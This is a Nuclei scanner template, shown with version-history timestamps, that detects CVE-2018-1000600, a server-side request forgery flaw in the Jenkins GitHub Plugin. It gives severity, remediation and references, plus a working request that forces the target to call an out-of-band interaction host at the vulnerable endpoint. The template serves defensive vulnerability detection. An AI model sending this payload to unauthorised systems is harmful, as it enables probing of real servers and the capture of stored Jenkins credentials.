nuclei-templates/http/cves/2018/CVE-2018-1000600.yaml

41 lines
1.5 KiB
YAML
Raw Normal View History

2021-07-26 17:18:45 +00:00
id: CVE-2018-1000600
info:
name: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery
author: geeknik
severity: high
2022-06-20 15:54:13 +00:00
description: |
2023-07-11 19:49:27 +00:00
Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability.
2021-07-26 17:18:45 +00:00
reference:
- https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
- https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000600
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2018-1000600
cwe-id: CWE-200
2023-07-11 19:49:27 +00:00
epss-score: 0.95579
2023-08-31 11:46:18 +00:00
epss-percentile: 0.99139
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: jenkins
product: github
2023-09-06 12:57:14 +00:00
framework: jenkins
2023-07-11 19:49:27 +00:00
tags: cve,cve2018,jenkins,ssrf,oast,github
2021-07-26 17:18:45 +00:00
http:
2021-07-26 17:18:45 +00:00
- method: GET
path:
- "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"